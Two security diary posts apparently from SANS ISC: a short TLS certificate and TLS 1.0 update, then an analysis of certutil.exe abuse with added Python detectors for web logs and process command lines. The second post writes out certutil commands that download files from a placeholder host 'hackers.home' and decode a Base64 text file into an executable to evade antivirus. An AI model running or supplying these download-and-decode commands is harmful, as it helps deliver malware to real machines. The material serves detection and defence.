ISC/DShield Website TLS Updates
On Thursday, we will switch our TLS certificate to one issued by Let's Encrypt. In the past, we used regular "commercial" certificates. Until a few months ago, we also used HTTP Public Key Pinning (HPKP). Browsers are dropping support for key pinning, so we decided to remove this feature, which is what made the move to Let's Encrypt possible. We removed the key-pinning header a while ago (an existing pin only expires once the max-age sent with it has elapsed, which is why the header had to go well before the certificate change), so browsers should no longer "pin" our sites. But if you experience problems connecting to this site later this week, please let us know. You may still be able to connect to www.dshield.org if you cannot connect to isc.sans.edu.
We will also make another attempt to turn off TLS 1.0 support. While strictly speaking not a big risk for our site, we try to follow best practices. In the past, we had issues with some podcast players. But the service hosting our podcast MP3s has already turned off TLS 1.0, so this should not be an issue anymore. Again: please report errors.
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
A Suspicious Use of certutil.exe
Microsoft Windows ships with many command-line tools that help perform administrative tasks. Some are easily installed, like the Sysinternals suite[1] with psexec.exe; others are built into Windows and available to everybody. Calls to such tools can help to detect suspicious behaviour: why reinvent the wheel if an existing tool achieves what you need? I recently upgraded my hunting rules on VirusTotal to collect samples that (ab)use the "certutil.exe" tool. The purpose of this tool is to dump and display certification authority (CA) information and to manage certificates and keys. It is a command-line tool that accepts a lot of parameters [2]. A classic use of certutil.exe is to easily process Base64-encoded data:
C:\Temp> certutil.exe -decode input.txt output.exe
But it is also possible to use the tool for a task that matters to attackers: fetching data from the Internet! Indeed, many Microsoft tools are able to fetch a file using a URL scheme (ftp://, http://, etc.). I presume you already know that, in every dialog box used to open or save a file, you can provide a URL instead of a local path.
It is exactly the same with certutil.exe, which can fetch data from the Internet. I spotted a script that uses it this way. Here is an example download:
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/malicious.exe" bad.exe
****  Online  ****
  000000  ...
  1056d0
CertUtil: -URLCache command completed successfully.
Interestingly, the tool makes two connections to the remote web server, using two different User-Agents. Here is an extract from the web server logs:
10.x.x.x - - [03/Apr/2018:21:21:11 +0200] "GET /malicious.exe HTTP/1.1" 200 1077596 "-" "Microsoft-CryptoAPI/10.0"
10.x.x.x - - [03/Apr/2018:21:21:15 +0200] "GET /malicious.exe HTTP/1.1" 200 1077540 "-" "CertUtil URL Agent"
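The two User-Agents above are the useful signal on the server side. The "CertUtil URL Agent" string is specific to certutil, while "Microsoft-CryptoAPI/10.0" is also what Windows sends for routine CRL and AIA fetches, so on its own it is a weak indicator. The following Python is an added example (not part of the original diary, and not the author's code) that scans Apache/nginx combined-format log lines, flags every "CertUtil URL Agent" request, and reports whether it was preceded within a short window by a CryptoAPI request for the same path from the same client, which is the double-fetch pattern shown in the extract. The log lines embedded in it are constructed for the example, modelled on the diary's extract.

```python
import re
from collections import namedtuple
from datetime import datetime, timedelta

# Constructed sample log (combined format), modelled on the diary's extract.
# The CRL fetch from 10.0.0.9 is benign CryptoAPI traffic and must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2018:21:20:02 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/59.0"
10.0.0.5 - - [03/Apr/2018:21:21:11 +0200] "GET /malicious.exe HTTP/1.1" 200 1077596 "-" "Microsoft-CryptoAPI/10.0"
10.0.0.5 - - [03/Apr/2018:21:21:15 +0200] "GET /malicious.exe HTTP/1.1" 200 1077540 "-" "CertUtil URL Agent"
10.0.0.9 - - [03/Apr/2018:21:30:40 +0200] "GET /pki/issuer.crl HTTP/1.1" 200 1232 "-" "Microsoft-CryptoAPI/10.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"   # combined-log timestamp, e.g. 03/Apr/2018:21:21:11 +0200

Event = namedtuple("Event", "ip ts path status ua")
Hit = namedtuple("Hit", "ip path status paired_with_cryptoapi")

CERTUTIL_UA = "CertUtil URL Agent"
CRYPTOAPI_UA_PREFIX = "Microsoft-CryptoAPI/"


def parse_combined_log(text):
    """Parse combined-format lines into Event tuples; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        events.append(Event(
            ip=m["ip"],
            ts=datetime.strptime(m["ts"], TS_FMT),
            path=m["path"],
            status=int(m["status"]),
            ua=m["ua"],
        ))
    return events


def find_certutil_downloads(text, window=timedelta(seconds=30)):
    """Return one Hit per request made with the certutil User-Agent.

    paired_with_cryptoapi is True when the same client fetched the same path
    with the Microsoft-CryptoAPI User-Agent in the `window` before the certutil
    request: the two-connection behaviour the diary observed.
    """
    events = parse_combined_log(text)
    hits = []
    for e in events:
        if e.ua != CERTUTIL_UA:
            continue
        paired = any(
            o.ua.startswith(CRYPTOAPI_UA_PREFIX)
            and o.ip == e.ip
            and o.path == e.path
            and timedelta(0) <= e.ts - o.ts <= window
            for o in events
        )
        hits.append(Hit(e.ip, e.path, e.status, paired))
    return hits


if __name__ == "__main__":
    for hit in find_certutil_downloads(SAMPLE_LOG):
        print(f"{hit.ip} fetched {hit.path} with certutil "
              f"(HTTP {hit.status}, CryptoAPI prefetch seen: {hit.paired_with_cryptoapi})")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents; the benign CRL fetch is not reported because only the certutil User-Agent triggers a hit, and the CryptoAPI line merely adds confidence when it pairs with one.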
What about the command line options?
- "-urlcache" is used to perform URL cache management action.
- "-f" is used to force fetching the specified URL and updating the cache.
- "-split" is used to dump the file on disk.
Let's combine the two features: grab a Base64-encoded text file, which gets past many AV engines and proxies because it does not look like an executable, then decode it to drop a malicious executable on the target:
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
So, no need to install curl or wget: certutil.exe is available for this basic feature!
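On the endpoint, the command line itself is what you hunt for. The following Python is an added example (not part of the original diary, and not the author's code) that triages process-creation command lines, such as the CommandLine field of Sysmon Event ID 1 or Windows Security event 4688, for the switches discussed above: -urlcache (download) and -decode, plus the inverse -encode, which is not on the page but is the same tool staging data for exfiltration. It normalises the things that trip naive string matches: mixed case, "/" instead of "-" for switches, and a quoted full path to certutil.exe. The sample command lines are constructed for the example; hackers.home is the diary's placeholder host.

```python
import re

# Constructed sample command lines, as they would appear in process-creation telemetry.
SAMPLE_CMDLINES = [
    r'certutil.exe -decode input.txt output.exe',
    r'"C:\Windows\System32\certutil.exe" -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt',
    r'certutil  /URLCACHE /f http://hackers.home/x.txt x.txt',
    r'certutil -encode secret.docx out.txt',
    r'certutil.exe -dump c:\temp\cert.cer',
    r'powershell -c Get-Date',
]

# Switches worth a closer look, with the reason reported for each.
SUSPICIOUS_SWITCHES = {
    "urlcache": "download via URL cache",
    "decode": "Base64 decode to file",
    "encode": "Base64 encode (staging/exfiltration)",
}
URL_RE = re.compile(r'\b(?:https?|ftp)://\S+', re.IGNORECASE)
TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # keep quoted arguments together


def triage_certutil(cmdline):
    """Return None for non-certutil processes, else a verdict dict.

    Detection keys on the executable name, so a renamed copy of certutil.exe
    needs a hash- or PE-metadata-based rule instead.
    """
    tokens = TOKEN_RE.findall(cmdline)
    if not tokens:
        return None
    exe = tokens[0].strip('"').rsplit('\\', 1)[-1].lower()
    if exe not in ("certutil", "certutil.exe"):
        return None
    # certutil accepts both -switch and /switch, case-insensitively.
    switches = {t.lstrip('-/').lower() for t in tokens[1:] if t[:1] in ('-', '/')}
    reasons = [why for name, why in SUSPICIOUS_SWITCHES.items() if name in switches]
    urls = [u.strip('"') for u in URL_RE.findall(cmdline)]
    return {
        "suspicious": bool(reasons) or bool(urls),
        "reasons": reasons,
        "urls": urls,
    }


def triage_all(cmdlines):
    """Return [(cmdline, verdict)] for the certutil invocations judged suspicious."""
    flagged = []
    for c in cmdlines:
        v = triage_certutil(c)
        if v and v["suspicious"]:
            flagged.append((c, v))
    return flagged


if __name__ == "__main__":
    for cmdline, verdict in triage_all(SAMPLE_CMDLINES):
        print(f"{'; '.join(verdict['reasons']) or 'URL on command line'}: {cmdline}")
        for u in verdict["urls"]:
            print(f"    -> {u}")
```

A plain "-dump" of a certificate is left alone, so the rule stays quiet during normal PKI administration; anything carrying a URL is flagged even if the switch set is unusual, because a URL on a certutil command line is the download case regardless of which switch introduces it.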
[1] https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
[2] https://ss64.com/nt/certutil.html
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant